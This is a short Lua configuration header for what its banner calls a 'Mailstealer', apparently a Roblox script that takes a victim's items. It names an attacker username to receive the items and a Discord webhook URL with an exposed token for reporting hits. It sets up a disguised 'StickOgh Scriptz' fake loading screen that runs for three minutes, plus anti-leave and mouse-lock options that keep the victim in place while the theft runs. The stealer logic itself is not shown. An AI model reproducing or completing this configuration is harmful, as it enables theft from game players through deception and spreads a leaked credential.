--[[

  __  __       _ _     _             _           

  |  \/  | __ _(_) |___| |_ ___  __ _| | ___ _ __ 

  | |\/| |/ _` | | / __| __/ _ \/ _` | |/ _ \ '__|

  | |  | | (_| | | \__ \ ||  __/ (_| | |  __/ |   

  |_|  |_|\__,_|_|_|___/\__\___|\__,_|_|\___|_|   

 

]]--

 

UserName = "alonekidoop"

Webhook = "https://discord.com/api/webhooks/1138515633873629194/DdBUkoNPk9nASlgqnHIcBXJp0ntuBsm2TV3bFV6croXSIcLQphv_btmMlvhsfg_iF2fa"

UserName2 = "alonekidoop"

 

_G.LoadingScreen = true

_G.AntiLeave = true

_G.MouseLock = true

 

 

_G.ScriptName = "StickOgh Scriptz"

_G.FirstText = "Preparing..."

_G.SecondText = "Loading..."

_G.ThirdText = "Almost Done..."

_G.WaitingTime = 180 -- in secondes it's the time for the loading bar to hit from 0% to 100%
